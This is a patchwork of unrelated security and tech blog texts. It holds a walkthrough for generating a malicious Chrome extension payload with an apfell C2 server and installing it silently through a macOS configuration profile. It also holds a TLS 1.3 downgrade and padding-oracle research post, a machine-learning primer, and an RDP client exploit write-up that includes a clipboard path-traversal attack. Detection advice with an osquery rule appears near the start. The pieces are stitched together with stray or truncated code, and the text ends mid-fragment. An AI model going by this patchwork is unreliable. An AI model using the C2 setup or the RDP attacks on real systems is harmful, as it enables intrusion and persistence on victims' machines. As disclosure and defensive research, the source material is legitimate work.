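print(render_update_manifest("aaaabbbbccccddddeeeeffffgggghhhh",
                             "https://example.com/ext.crx", "2.0"))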
Let’s walk through configuring a custom C2 profile and generating a payload.

1) For initial setup instructions, please see the apfell documentation here. Once the apfell server is up, register a new user and make yourself an admin. Next, you’ll need to clone the apfell-chrome-ext-payload and apfell-chrome-extension-c2server projects onto your apfell server.

2) Navigate to manage operations -> payload management. The payloads for apfell-jxa and linfell are both defined on this page. For each payload, there are several commands defined. Any of these commands can be modified within the console and then updated in the agent (specifically for apfell-jxa and linfell). At the bottom left corner of the payloads page is an import button. This allows a user to import a custom payload, along with each command, from a JSON file. Please import this file to save some time creating the payload. If the import was successful, you should see chrome-extension as a new payload type with a few commands to start.

Figure 6

3) Now open a terminal session on your apfell server and navigate to the apfell-chrome-extension-c2server project. Run the install.sh script to install golang and compile the server binary. Verify that the server binary compiled successfully and is present in the $HOME/go/src/apfell-chrome-extension-c2server directory.

4) Navigate to Manage Operations -> C2 Profiles. Click on Register C2 profile on the bottom left of the page. Here you’ll provide the name of the profile, description, and supported payloads. Upload the C2 server binary ($HOME/go/src/apfell-chrome-extension-c2server/server) and the C2 client code (./apfell-chrome-ext-payload/apfell/c2profiles/chrome-extension.js) for the extension.

Figure 7

5) Once the profile is submitted, the profiles page should update and show the new profile.

6) Back in your terminal session on the apfell server, edit the c2config.json file and choose the options you desire.

Figure 8

7) Copy the c2config.json to the apfell/app/c2profiles/default/chrome-extension/ directory. Rename the server binary to <c2profilename>_server. This is necessary in order to start the c2 server from the apfell UI. Now start the C2 server in apfell.

Figure 9

8) Navigate to Create Components -> Create Base Payload. Select chrome-extension for the C2 profile and payload type. Fill out the required parameters (Hostname, Port, Endpoint, SSL, and Interval). Provide the desired filename and then click submit. If all goes well, a success message will be displayed at the top of the page.

Figure 10

9) To download the payload, go to Manage Operations -> Payload Management. Now that you’ve set up the extension payload and C2 profile, you can export them to use in other operations.

10) Copy and paste all of the code from the payload into the chrome extension project file ./apfell-chrome-ext-payload/apfell/extension-skeleton/src/bg/main.js. Edit the manifest.json file in the extension-skeleton directory and replace all of the *_REPLACE values. The update_url does not need to be a legitimate URL if the auto-update feature isn’t used.

Figure 11

11) Open Google Chrome, click on More -> More Tools -> Extensions and toggle developer mode. Click on pack extension and select the extension-skeleton directory within the apfell-chrome-ext-payload project. Click on pack extension once again and Chrome will output the .crx file with the private key. Note that you’ll need to keep the private key in order to update the extension.

12) The last piece of information you’ll need is the application ID.
Unfortunately, the only way to obtain this is to install the extension and note the ID shown on the extensions page. Drag the extension file (.crx) onto the extensions page to install it.

Figure 12

13) Now you have the information needed to create your mobile configuration file and host the update manifest and crx file. Add the application ID and the URL that points to the crx file to the update manifest file. Then add the application ID and update_url to the example mobile configuration file here. Additionally, you’ll need to add in two unique UUIDs.

Figure 13
Figure 14

14) Now the setup is complete! If everything is properly configured, installing the mobile configuration profile should trigger a silent install of the extension and add a new callback on the apfell active callbacks page. Refer to the Payload Delivery section for details on installing the profile.

Figure 15

Here’s a quick demonstration of delivering a malicious chrome extension via a mobile configuration profile.

Detection

In the Payload Delivery section, we briefly covered a delivery mechanism for Chrome extensions that allows for silent and hidden installs via mobile configuration profiles. From a defensive perspective, detections for this delivery mechanism should be focused on the profiles command and its arguments. This would be most suitable in a situation where the attacker already has access to the victim host. Specifically, the command for installing a profile looks like this: profiles install -type=configuration -path=/path/to/profile.mobileconfig. The corresponding osquery rule would look like this: "SELECT * FROM process_events WHERE cmdline LIKE '%profiles install%';". This may not be the best answer in an enterprise environment, but it’s a solid starting point. Also note that the osquery schema now includes a chrome_extensions table.

Additionally, when a profile is installed through the UI, the MCXCompositor process writes a binary plist to the /Library/Managed Preferences/username/ directory. The plist file is a copy of the mobile configuration profile. The filename is determined by the PayloadType key in the configuration profile.

Figure 16

There may be other data sources that enable more robust detections for the use of mobile configuration profiles, but this should serve as a good start. Google Chrome extensions should definitely be considered for initial access and persistence. I would encourage other red teamers and security researchers to investigate the Chrome APIs for additional functionality.

Originally published at www.xorrior.com.

Source: https://posts.specterops.io/no-place-like-chrome-122e500e421f
Downgrade Attack on TLS 1.3 and Vulnerabilities in Major TLS Libraries

On November 30, 2018, we disclosed CVE-2018-12404, CVE-2018-19608, CVE-2018-16868, CVE-2018-16869, and CVE-2018-16870. These were from vulnerabilities found back in August 2018 in several TLS libraries.

Back on May 15, I approached Yuval Yarom with a few issues I had found in some TLS implementations. This led to a collaboration between Eyal Ronen, Robert Gillham, Daniel Genkin, Adi Shamir, Yuval Yarom and me. Spearheaded by Eyal, the research has now been published here. And as you can see, the inventor of RSA himself is now recommending that you deprecate RSA in TLS.

We tested nine different TLS implementations against cache attacks and seven were found to be vulnerable: OpenSSL, Amazon s2n, MbedTLS, Apple CoreTLS, Mozilla NSS, WolfSSL, and GnuTLS. The cat is not dead yet, with two lives remaining thanks to BearSSL (developed by my colleague Thomas Pornin) and Google's BoringSSL.

The attack leverages a side-channel leak via cache access timings of these implementations in order to break the RSA key exchanges of TLS implementations. The attack is interesting from multiple points of view (besides the fact that it affects many major TLS implementations):

It affects all versions of TLS (including TLS 1.3) and QUIC, where the latter version of TLS does not even offer an RSA key exchange! This prowess is achieved because of the only known downgrade attack on TLS 1.3.
It uses state-of-the-art cache attack techniques. Flush+Reload? Prime+Probe? Branch-Prediction? We have it.
The attack is very efficient. We found ways to ACTIVELY target any browser, slow some of them down, or use the long-tail distribution to repeatedly try to break a session. We even make use of lattices to speed up the problem.
Manger and Ben-Or on RSA PKCS#1 v1.5. You heard of Bleichenbacher's million messages attack? Guess what, we found better. We use Manger's OAEP attack on RSA PKCS#1 v1.5 and even Ben-Or's algorithm, which is more efficient than, and was published BEFORE, Bleichenbacher's work in 1998.

I uploaded some of the code here. To learn more about the research, you should read the white paper. I will talk specifically about protocol-level exploitation in this blog post.

Attacking RSA, The Origins

Although the research of Ben-Or et al. was initially used to support the security proofs of RSA, it also outlined attacks on the protocol. Fifteen years later, in 1998, Daniel Bleichenbacher discovered a padding oracle and devised a unique and practical attack of his own on RSA. The consequences were severe: most TLS implementations could be broken, and thus mitigations were designed to prevent Daniel's attack. There followed a long series of "re-discoveries" in which the world realized that it is not so easy to implement the advised mitigations:

Bleichenbacher (CRYPTO 1998), also called the 1 million message attack, BB98, padding oracle attack on PKCS#1 v1.5, etc.
Klima et al. (CHES 2003)
Bleichenbacher’s Attack Strikes Again: Breaking PKCS#1 v1.5 in XML Encryption (ESORICS 2012)
Degabriele et al. (CT-RSA 2012)
Bardou et al. (CRYPTO 2012)
Cross-Tenant Side-Channel Attacks in PaaS Clouds (CCS 2014)
Revisiting SSL/TLS Implementations: New Bleichenbacher Side Channels and Attacks (USENIX 2014)
On the Security of TLS 1.3 and QUIC Against Weaknesses in PKCS#1 v1.5 Encryption (CCS 2015)
DROWN (USENIX 2016)
Return Of Bleichenbacher's Oracle Threat (USENIX 2018)
The Dangers of Key Reuse: Practical Attacks on IPsec IKE (USENIX 2018)

Let's be realistic: the mitigations that developers had to implement were unrealistic. Furthermore, an implementation that would attempt to log such attacks would actually help the attacks. Isn't that funny? The research I'm talking about today can be seen as one more of these "re-discoveries." My previous boss' boss (Scott Stender) once told me: "You can either be the first paper on the subject, or the best written one, or the last one." We're definitely not the first one, I don't know if we write that well, but we sure are hoping to be the last one.

RSA in TLS?

Briefly, SSL/TLS (except TLS 1.3) can use an RSA key exchange during a handshake to negotiate a shared secret. An RSA key exchange is pretty straightforward: the client encrypts a shared secret under the server's RSA public key, then the server receives it and decrypts it. If we can use our attack to decrypt this value, we can then passively decrypt the session (and obtain a cookie, for example), or we can actively impersonate one of the peers.

Attacking Browsers, In Practice

We employ the BEAST-attack model (in addition to being colocated with the victim server for the cache attack), which I have previously explained in a video here.

Beast

With this position, we then attempt to decrypt the session between a victim client (Bob) and bank.com: we can serve him some JavaScript content that will continuously attempt new connections to bank.com. (If it doesn't attempt a new connection, we can force it by making the current one fail, since we're in the middle.)

Why several connections instead of just one? Because most browsers (except Firefox, which we can fool) will time out after some time (usually 30s). If an RSA key exchange is negotiated between the two peers: it's great, we have all the time in the world to passively attack the protocol. If an RSA key exchange is NOT negotiated: we need to actively attack the session to either downgrade or fake the server's RSA signature (more on that later). This takes time, because the attack requires us to send thousands of messages to the server. It will likely fail. But if we can try again, many times? It will likely succeed after a few trials. And that is why we continuously send connection attempts to bank.com.

Attacking TLS 1.3

Two ways exist to attack TLS 1.3. In each attack, the server needs to support an older version of the protocol as well. The first technique relies on the fact that the current server’s public key is an RSA public key, used to sign its ephemeral keys during the handshake, and that the older version of TLS that the server supports re-uses the same keys. The second one relies on the fact that both peers support an older version of TLS with a cipher suite supporting an RSA key exchange.

While TLS 1.3 does not use the RSA encryption algorithm for its key exchanges, it does use the signature algorithm of RSA for them; if the server’s certificate contains an RSA public key, it will be used to sign its ephemeral public keys during the handshake. A TLS 1.3 client can advertise which RSA signature algorithm it wants to support (if any) between RSA and RSA-PSS.
As most TLS 1.2 servers already provide support for RSA, most will re-use their certificates instead of updating to the more recent RSA-PSS. RSA digital signatures specified per the standard are really close to the RSA encryption algorithm specified by the same document, so close that Bleichenbacher’s decryption attack on RSA encryption also works to forge RSA signatures. Intuitively, we have pms^e, and the decryption attack allows us to find (pms^e)^d = pms. For forging signatures, we can pretend that the content to be signed, tbs (see RFC 8446), is tbs = pms^e, and obtain tbs^d via the attack, which is by definition the signature over the message tbs. However, this signature forgery requires an additional step (blinding) in the conventional Bleichenbacher attack. In practice this can lead to hundreds of thousands of additional messages.

The TLS 1.3 signature forgery attack using a TLS 1.2 server as a Bleichenbacher oracle.

Key re-use has been shown in the past to allow for complex cross-protocol attacks on TLS. Indeed, we can successfully forge our own signature of the handshake transcript (contained in the CertificateVerify message) by negotiating a previous version of TLS with the same server. The attack can be carried out if this new connection exposes a length or Bleichenbacher oracle with a certificate using the same RSA key but for key exchanges.

Downgrading to TLS 1.2

Every TLS connection starts with a negotiation of the TLS version and other connection attributes. As the new version of TLS (1.3) does not offer an RSA key exchange, the exploitation of our attack must first begin with a downgrade to an older version of TLS. TLS 1.3 being relatively recent (August 2018), most servers supporting it will also support older versions of TLS (which all provide support for RSA key exchanges). A server not supporting TLS 1.3 would thus respond with an older TLS version’s (TLS 1.2 in our example) ServerHello message. To downgrade a client’s connection attempt, we can simply spoof this answer from the server. Besides protocol downgrades, other techniques exist to force browser clients to fall back onto older TLS versions: network glitches, a spoofed TCP RST packet, a lack of response, etc. (see POODLE).

The TLS 1.3 attack downgrades the victim to an older version of TLS.

Continuing with a spoofed TLS 1.2 handshake, we can simply present the server’s RSA certificate in a ServerCertificate message and then end the handshake with a ServerHelloDone message. At this point, if the server does not have a trusted certificate allowing for RSA key exchanges, or if the client refuses to support RSA key exchanges or older versions than TLS 1.2, the attack is stopped. Otherwise, the client uses the RSA public key contained in the certificate to encrypt the TLS premaster secret, sends it in a ClientKeyExchange message, and ends its part of the handshake with ChangeCipherSpec and Finished messages.

The decryption attack performs a new handshake with the server, using the modified encrypted premaster secret obtained from the victim’s ClientKeyExchange message.

At this point, we need to perform our attack in order to decrypt the RSA-encrypted premaster secret. The last Finished message that we send must contain an authentication tag (with HMAC) of the whole transcript, in addition to being encrypted with the transport keys derived from the premaster secret.
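As a quick refresher on what such a padding oracle distinguishes, here is a sketch of the textbook RSA PKCS#1 v1.5 conformance check (illustrative only, not code from the paper). A server that reveals, through timing or cache behaviour, whether this check passed can be used as a decryption oracle:

import os

def pkcs1_v15_conformant(padded, k):
    """Textbook check for RSA PKCS#1 v1.5 encryption padding:
    0x00 0x02 || at least 8 nonzero pad bytes || 0x00 || message.
    Any observable difference in how non-conformant plaintexts
    are rejected is the oracle."""
    if len(padded) != k or padded[0] != 0x00 or padded[1] != 0x02:
        return False
    try:
        sep = padded.index(0x00, 2)  # first 0x00 after the pad
    except ValueError:
        return False
    return sep >= 10                 # at least 8 padding bytes

# Example: a conformant 48-byte premaster secret in a 256-byte block
k = 256
pms = os.urandom(48)
pad = bytes(x or 1 for x in os.urandom(k - 3 - len(pms)))  # nonzero pad
block = b"\x00\x02" + pad + b"\x00" + pms
print(pkcs1_v15_conformant(block, k))  # True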
While some clients will have no handshake timeouts, most serious applications like browsers will give up on the connection attempt if our response takes too much time to arrive. While the attack only takes a few thousand messages, this might still be too much in practice. Fortunately, several techniques exist to slow down the handshake:

we can send the ChangeCipherSpec message, which might reset the client’s timer
we can send TLS warning alerts to reset the handshake timer

Once the decryption attack terminates, we can send the expected Finished message to the client and finalize the handshake. From there everything is possible, from passively relaying and observing messages to the impersonated server through to actively tampering with requests made to it.

This downgrade attack bypasses multiple downgrade mitigations: one server-side and two client-side. TLS 1.3 servers that negotiate older versions of TLS must advertise this information to their peers. This is done by setting a quarter of the bytes from the server_random field in the ServerHello message to a known value. TLS 1.3 clients that end up negotiating an older version of TLS must check for these values and abort the handshake if found. But as noted by the RFC, “It does not provide downgrade protection when static RSA is used.” – since we alter this value to remove the warning bytes, the client has no opportunity to detect our attack. On the other hand, a TLS 1.3 client that ends up falling back to an older version of TLS must advertise this information in its subsequent client hellos; since we impersonate the server, we can simply ignore this warning. Furthermore, a client also includes the version used by the client hello inside of the encrypted premaster secret. For the same reason as previously, this mitigation has no effect on our attack. As it stands, RSA is the only known downgrade attack on TLS 1.3, which we are the first to successfully exploit in this research.

Attacking TLS 1.2

As with the previous attack, both the client and the server targeted need to support RSA key exchanges. As this is a typical key exchange, most known browsers and servers support them, although they will often prefer to negotiate a forward-secret key exchange based on ephemeral versions of the Elliptic Curve or Finite Field Diffie-Hellman key exchanges. This is done as part of the cipher suite negotiation during the first two handshake messages. To avoid this outcome, the ClientHello message can be intercepted and modified to strip out any non-RSA key exchanges advertised. The server will then only choose from a set of RSA-key-exchange-based cipher suites, which will allow us to perform the same attack as previously discussed. Our modification of the ClientHello message can only be detected with the Finished message authenticating the correct handshake transcript, but since we are in control of this message, we can forge the expected tag.

The attack on TLS 1.2 modifies the client’s first packet to force an RSA key exchange.

On the other side, if both peers end up negotiating an RSA key exchange on their own, we can passively observe the connection and take our time to break the session.

Take Aways

For each vulnerability discovered, there are three kinds of articles you can read: the first paper, the best explanation on the subject, and finally the last paper. We're hoping to be the last paper.
The last 20 years of attacks re-discovering Bleichenbacher's seminal work from 1998 clearly show that it is close to impossible to correctly implement the RSA PKCS#1 v1.5 encryption scheme. While our paper recommends a series of mitigations, it is time for RSA PKCS#1 v1.5 to be deprecated and replaced by more modern schemes like OAEP and ECIES for asymmetric encryption, or Elliptic Curve Diffie-Hellman for key exchanges.

Finally, we note that keyless implementations of TLS are attractive targets, but are most often closed source and thus were not analyzed in this work.

Published date: 07 February 2019
Written by: David Wong

Source: https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2019/february/downgrade-attack-on-tls-1.3-and-vulnerabilities-in-major-tls-libraries/
Machine Learning for Everyone

In simple words. With real-world examples. Yes, again.

21 November 2018

This article in other languages: Russian (original)
Special thanks for help: @wcarss, @sudodoki and my wife ❤️

Machine Learning is like sex in high school. Everyone is talking about it, a few know what to do, and only your teacher is doing it. If you ever tried to read articles about machine learning on the Internet, most likely you stumbled upon two types of them: thick academic trilogies filled with theorems (I couldn’t even get through half of one) or fishy fairytales about artificial intelligence, data-science magic, and jobs of the future.

I decided to write a post I’ve been wishing existed for a long time. A simple introduction for those who always wanted to understand machine learning. Only real-world problems, practical solutions, simple language, and no high-level theorems. One for everyone, whether you are a programmer or a manager. Let's roll.

Why do we want machines to learn?

This is Billy. Billy wants to buy a car. He tries to calculate how much he needs to save monthly for that. He went over dozens of ads on the internet and learned that new cars are around $20,000, used year-old ones are $19,000, 2-year-old ones are $18,000 and so on.

Billy, our brilliant analyst, starts seeing a pattern: so, the car price depends on its age and drops $1,000 every year, but won't get lower than $10,000.

In machine learning terms, Billy invented regression – he predicted a value (price) based on known historical data. People do it all the time when trying to estimate a reasonable cost for a used iPhone on eBay or figure out how many ribs to buy for a BBQ party. 200 grams per person? 500?

Yeah, it would be nice to have a simple formula for every problem in the world. Especially for a BBQ party. Unfortunately, it's impossible.

Let's get back to cars. The problem is, they have different manufacturing dates, dozens of options, technical condition, seasonal demand spikes, and god only knows how many more hidden factors. An average Billy can't keep all that data in his head while calculating the price. Me too.

People are dumb and lazy – we need robots to do the maths for them. So, let's go the computational way here. Let's provide the machine some data and ask it to find all hidden patterns related to price. Aaaand it works. The most exciting thing is that the machine copes with this task much better than a real person does when carefully analyzing all the dependencies in their mind.

That was the birth of machine learning.

Full article: https://vas3k.com/blog/machine_learning/
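Billy's rule of thumb is itself a tiny model. As an illustrative sketch (the prices are the figures from the example above; everything else is made up), here is his rule next to a least-squares fit of the same data:

# Billy's hand-made model vs. a least-squares fit of the same idea.
ages   = [0, 1, 2, 3, 4]
prices = [20000, 19000, 18000, 17000, 16000]

def billys_rule(age):
    # price drops $1,000 per year, floored at $10,000
    return max(20000 - 1000 * age, 10000)

# Ordinary least squares for price = a*age + b, computed by hand
n = len(ages)
mean_x = sum(ages) / n
mean_y = sum(prices) / n
a = sum((x - mean_x) * (y - mean_y) for x, y in zip(ages, prices)) / \
    sum((x - mean_x) ** 2 for x in ages)
b = mean_y - a * mean_x

print(billys_rule(3), round(a * 3 + b))  # both predict ~17000

The point of the article is exactly this jump: instead of Billy hand-deriving a and b, we hand the machine the data and let it find them, plus all the hidden factors he can't hold in his head.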
Reverse RDP Attack: Code Execution on RDP Clients

February 5, 2019
Research by: Eyal Itkin

Overview

Used by thousands of IT professionals and security researchers worldwide, the Remote Desktop Protocol (RDP) is usually considered a safe and trustworthy application to connect to remote computers. Whether it is used to help those working remotely or to work in a safe VM environment, RDP clients are an invaluable tool.

However, Check Point Research recently discovered multiple critical vulnerabilities in the commonly used Remote Desktop Protocol (RDP) that would allow a malicious actor to reverse the usual direction of communication and infect the IT professional or security researcher’s computer. Such an infection could then allow for an intrusion into the IT network as a whole.

16 major vulnerabilities and a total of 25 security vulnerabilities were found overall. The full list can be found in Appendix A & B.

Introduction

The Remote Desktop Protocol (RDP), also known as “mstsc” after the Microsoft built-in RDP client, is commonly used by technical users and IT staff to connect to / work on a remote computer. RDP is a proprietary protocol developed by Microsoft and is usually used when a user wants to connect to a remote Windows machine. There are also some popular open-source clients for the RDP protocol that are used mainly by Linux and Mac users.

RDP offers many complex features, such as: compressed video streaming, clipboard sharing, and several encryption layers. We therefore decided to look for vulnerabilities in the protocol and its popular implementations.

In a normal scenario, you use an RDP client, and connect to a remote RDP server that is installed on the remote computer. After a successful connection, you now have access to and control of the remote computer, according to the permissions of your user. But what if the scenario could be put in reverse? We wanted to investigate if the RDP server can attack and gain control over the computer of the connected RDP client.

Figure 1: Attack scenario for the RDP protocol

There are several common scenarios in which an attacker can gain elevated network permissions by deploying such an attack, thus advancing his lateral movement inside an organization:

Attacking an IT member that connects to an infected work station inside the corporate network, thus gaining higher permission levels and greater access to the network systems.
Attacking a malware researcher that connects to a remote sandboxed virtual machine that contains a tested malware. This allows the malware to escape the sandbox and infiltrate the corporate network.

Now that we decided on our attack vector, it is time to introduce our targets, the most commonly used RDP clients:

mstsc.exe – Microsoft’s built-in RDP client.
FreeRDP – The most popular and mature open-source RDP client on Github.
rdesktop – Older open-source RDP client, which comes by default in Kali Linux distros.

Fun fact: As “rdesktop” is the built-in client in Kali Linux, a Linux distro used by red teams for penetration testing, we thought of a third (though probably not practical) attack scenario: blue teams can install organizational honeypots and attack red teams that try to connect to them through the RDP protocol.

Open-Source RDP Clients

As is usually the case, we decided to start looking for vulnerabilities in the open-source clients. It seemed that it would only make sense to start reverse engineering Microsoft’s client after we had a firm understanding of the protocol.
In addition, if we find common vulnerabilities in the two open-sourced clients, we could check if they also apply to Microsoft’s client. In a recon check, it looked like “rdesktop” is smaller than “FreeRDP” (has fewer lines of code), and so we selected it as our first target.

Note: We decided to perform an old-fashioned manual code audit instead of using any fuzzing technique. The main reasons for this decision were the overhead of writing a dedicated fuzzer for the complex RDP protocol, together with the fact that using AFL for a protocol with several compression and encryption layers didn’t look like a good idea.

rdesktop

Tested version: v1.8.3

After a short period, it looked like the decision to manually search for vulnerabilities paid off. We soon found several vulnerable patterns in the code, making it easier to “feel” the code, and pinpoint the locations of possible vulnerabilities. We found 11 vulnerabilities with a major security impact, and 19 vulnerabilities overall in the library. For the full list of CVEs for “rdesktop”, see Appendix A.

Note: An additional recon showed that the xrdp open-source RDP server is based on the code of “rdesktop”. Based on our findings, it appears that similar vulnerabilities can be found in “xrdp” as well.

Instead of a technical analysis of all of the CVEs, we will focus on two common vulnerable code patterns that we found.

Remote Code Executions – CVEs 2018-20179 – 2018-20181

Throughout the code of the client, there is an assumption that the server sent enough bytes to the client to process. One example of this assumption can be found in the following code snippet in Figure 2:

Figure 2: Parsing 2 fields from stream “s” without first checking its size

As we can see, the fields “length” and “flags” are parsed from the stream “s”, without checking that “s” indeed contains the required 8 bytes for this parsing operation. While this usually only leads to an Out-Of-Bounds read, we can combine this vulnerability with an additional vulnerability in several of the inner channels and achieve a much more severe effect.

There are three logical channels that share a common vulnerability:

lspci
rdpsnddbg – yes, this debug channel is always active
seamless

The vulnerability itself can be seen in Figure 3:

Figure 3: Integer-Underflow when calculating the remaining “pkglen”

By reading too much data from the stream, i.e. sending a chopped packet to the client, the invariant that “s->p <= s->end” breaks. This leads to an Integer-Underflow when calculating “pkglen”, and to an additional Integer-Overflow when allocating “xmalloc(pkglen + 1)” bytes for our buffer, as can be seen in my comment above the call to “xmalloc”. Together with the proprietary implementation of “STRNCPY”, seen in Figure 4, we can trigger a massive heap-based buffer overflow when copying data to the tiny allocated heap buffer.

Figure 4: Proprietary implementation of the “strncpy” function

By chaining together these two vulnerabilities, found in three different logical channels, we now have three remote code execution vulnerabilities.

CVE 2018-8795 – Remote Code Execution

Another classic vulnerability is an Integer-Overflow when processing the received bitmap (screen content) updates, as can be seen in Figure 5:

Figure 5: Integer-Overflow when processing bitmap updates

Although “width” and “height” are only 16 bits each, by multiplying them together with “Bpp” (bits-per-pixel), we can trigger an Integer-Overflow.
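The wraparound is easy to reproduce. A quick sketch of how a 32-bit multiplication of these fields can wrap (the values are illustrative, not taken from the advisory):

# 16-bit width/height and a bits-per-pixel multiplier, reduced mod 2**32
# the way a 32-bit C multiplication would be.
width, height, bpp = 0x8000, 0x8000, 16

exact   = width * height * bpp   # 0x400000000, needs 35 bits
wrapped = exact & 0xFFFFFFFF     # what a uint32 actually stores: 0

print(exact, wrapped)  # 17179869184 0 -> a 0-byte buffer is allocated,
                       # then the decompressor writes far past it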
Later on, the bitmap decompression will process our input and break on any decompression error, giving us a controllable heap-based buffer overflow.

Note: This tricky calculation can be found in several places throughout the code of “rdesktop”, so we marked it as a potential vulnerability to check for in “FreeRDP”.

FreeRDP

Tested version: 2.0.0-rc3

After finding multiple vulnerabilities in “rdesktop”, we approached “FreeRDP” with some trepidation; perhaps only “rdesktop” had vulnerabilities when implementing RDP? We still can’t be sure that every implementation of the protocol will be vulnerable. And indeed, at first glance, the code seemed much better: there are minimal size checks before parsing data from the received packet, and the code “feels” more mature. It was going to be a challenge. However, after a deeper examination, we started to find cracks in the code, and eventually we found critical vulnerabilities in this client as well. We found 5 vulnerabilities with major security impact, and 6 vulnerabilities overall in the library. For the full list of CVEs for “FreeRDP”, see Appendix B.

Note: An additional recon showed that the RDP client NeutrinoRDP is a fork of an older version (1.0.1) of “FreeRDP” and therefore probably suffers from the same vulnerabilities.

At the end of our research, we developed a PoC exploit for CVE 2018-8786, as can be seen in this video.

CVE 2018-8787 – Same Integer-Overflow

As we saw earlier in “rdesktop”, calculating the dimensions of a received bitmap update is susceptible to Integer-Overflows. And indeed, “FreeRDP” shares the same vulnerability:

Figure 6: Same Integer-Overflow when processing bitmap updates

Remote Code Execution – CVE 2018-8786

Figure 7: Integer-Truncation when processing bitmap updates

As can be seen in Figure 7, there is an Integer-Truncation when trying to calculate the required capacity for the bitmap updates array. Later on, rectangle structs will be parsed from our packet and into the memory of the too-small allocated buffer. This specific vulnerability is followed by a controlled amount (“bitmapUpdate->number”) of heap allocations (with a controlled size) when the rectangles are parsed and stored in the array, granting the attacker a great heap-shaping primitive. The downside of this vulnerability is that most of the rectangle fields are only 16 bits wide, and are upcast to 32 bits to be stored in the array. Despite this, we managed to exploit this CVE in our PoC. Even this partially controlled heap-based buffer overflow is enough for a remote code execution.

Mstsc.exe – Microsoft’s RDP Client

Tested version: Build 18252.rs_prerelease.180928-1410

After we finished checking the open-source implementations, we felt that we had a pretty good understanding of the protocol and could start to reverse engineer Microsoft’s RDP client. But first things first, we need to find which binaries contain the logic we want to examine. The *.dll and *.exe files we chose to focus on:

rdpbase.dll – Protocol layer for the RDP client.
rdpserverbase.dll – Protocol layer for the RDP server.
rdpcore.dll / rdpcorets.dll – Core logic for the RDP engine.
rdpclip.exe – An .exe we found and that we will introduce later on.
mstscax.dll – Mostly the same RDP logic, used by mstsc.exe.

Testing Prior Vulnerabilities

We started by testing our PoCs for the vulnerabilities in the open-source clients. Unfortunately, all of them caused the client to close itself cleanly, without any crash.
Having no more excuses, we opened IDA and started to track the flow of the messages. Soon enough, we realized that Microsoft’s implementation is much better than the implementations we tested previously. Actually, it seems like Microsoft’s code is better by several orders of magnitude, as it contains:

Several optimization layers for efficient network streaming of the received video.
Robust input checks.
Robust decompression checks, to guarantee that no byte will be written past the destination buffer.
Additional supported clipboard features.
…

Needless to say, there were checks for Integer-Overflows when processing bitmap updates.

Wait a minute, they share a clipboard?

When we checked “rdesktop” and “FreeRDP”, we found several vulnerabilities in the clipboard sharing channel (every logical data layer is called a channel). However, at the time, we didn’t pay much attention to it because they only shared two formats: raw text and Unicode text. This time it seems that Microsoft supports several more shared data formats, as the switch table we saw was much bigger than before. After reading more about the different formats on MSDN, one format immediately attracted our attention: “CF_HDROP”. This format seems responsible for “Drag & Drop” (hence the name HDROP), and in our case, the “Copy & Paste” feature. It’s possible to simply copy a group of files from the first computer, and paste them on the second computer. For example, a malware researcher might want to copy the output log of his script from the remote VM to his desktop.

It was roughly at this point, while I was trying to figure out the flow of the data, that Omer (@GullOmer) asked me if and where PathCanonicalizeA is called. If the client fails to properly canonicalize and sanitize the file paths it receives, it could be vulnerable to a path-traversal attack, allowing the server to drop arbitrary files in arbitrary paths on the client’s computer, a very strong attack primitive. After failing to find imports for the canonicalization function, we dug deeper, trying to figure out the overall architecture for this data flow. Figure 8 summarizes our findings:

Figure 8: Architecture of the clipboard sharing in Microsoft’s RDP

This is where rdpclip.exe comes into play. It turns out that the server accesses the clipboard through a broker, and that is rdpclip.exe. In fact, rdpclip.exe is just a normal process (we can kill / spawn it ourselves) that talks to the RDP service using a dedicated virtual channel API. At this stage, we installed ClipSpy and started to dynamically debug the clipboard’s data handling that is done inside rdpclip.exe. These are our conclusions regarding the data flow in an ordinary “Copy & Paste” operation in which a file is copied from the server to the client:

On the server, the “copy” operation creates clipboard data of the format “CF_HDROP”.
When the “paste” is performed on the client’s computer, a chain of events is triggered.
The rdpclip.exe process on the server is asked for the clipboard’s content, and converts it to a FileGroupDescriptor (Fgd) clipboard format.
The metadata of the files is added to the descriptor one at a time, using the HdropToFgdConverter::AddItemToFgd() function.
After it is finished, the Fgd blob is sent to the RDP service on the server.
The server simply wraps it and sends it to the client.
The client unwraps it and stores it in its own clipboard.
A “paste” event is sent to the process of the focused window (for example, explorer.exe).
This process handles the event and reads the data from the clipboard.
The content of the files is received over the RDP connection itself.

Path Traversal over the shared RDP clipboard
If we look back at the steps performed on the received clipboard data, we notice that the client doesn’t verify the received Fgd blob that came from the RDP server. And indeed, if we modify the server to include a path traversal path of the form ..\canary1.txt, ClipSpy shows us (see Figure 9) that it was stored “as is” on the client’s clipboard:
Figure 9: Fgd with a path-traversal was stored on the client’s clipboard
In Figure 10, we can see how explorer.exe treats a path traversal of ..\filename.txt:
Figure 10: Fgd with a path-traversal as explorer.exe handles it
Just to make sure, after the “paste” in folder “Inner”, the file is stored in “Base” instead:
Figure 11: Folders after a successful path traversal attack

And that’s practically it. If a client uses the “Copy & Paste” feature over an RDP connection, a malicious RDP server can transparently drop arbitrary files to arbitrary file locations on the client’s computer, limited only by the permissions of the client. For example, we can drop malicious scripts to the client’s “Startup” folder, and after a reboot they will be executed on the client’s computer, giving us full control.

Note: In our exploit, we simply killed rdpclip.exe and spawned our own process to perform the path traversal attack by adding an additional malicious file to every “Copy & Paste” operation. The attack was performed with “user” permissions and does not require the attacker to have “system” or any other elevated permission.

Here is a video of our PoC exploit:

Taking it one step further
Every time a clipboard is updated on either side of the RDP connection, a CLIPRDR_FORMAT_LIST message is sent to the other side to notify it about the new clipboard formats that are now available. We can think of it as a complete sync between the clipboards of both parties (except for a small set of formats that are treated differently by the RDP connection itself). This means that our malicious server is notified whenever the client copies something to his “local” clipboard, and it can now query the values and read them. In addition, the server can notify the client about a clipboard “update” without the need for a “copy” operation inside the RDP window, thus completely controlling the client’s clipboard without being noticed.

Scenario #1: A malicious RDP server can eavesdrop on the client’s clipboard – this is a feature, not a bug. For example, the client locally copies an admin password, and now the server has it too.

Scenario #2: A malicious RDP server can modify any clipboard content used by the client, even if the client does not issue a “copy” operation inside the RDP window. If you click “paste” when an RDP connection is open, you are vulnerable to this kind of attack. For example, if you copy a file on your computer, the server can modify your (executable?) file / piggy-back on your copy to add additional files / path-traversal files using the previously shown PoC.

We were able to successfully test this attack scenario using NCC’s .NET deserialization PoC:
The server executes their PoC and places in the clipboard .NET content that will pop a calculator (using the “System.String” format).
When the client clicks “paste” inside the PowerShell program, the deserialization occurs and a calc is popped.
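To recap the root cause before the disclosure timeline: the client should reject any received file name that can escape the intended drop directory. The check below is our own hedged sketch of what that sanitization boils down to, an illustration rather than the code Microsoft ships:

#include <stdbool.h>
#include <string.h>

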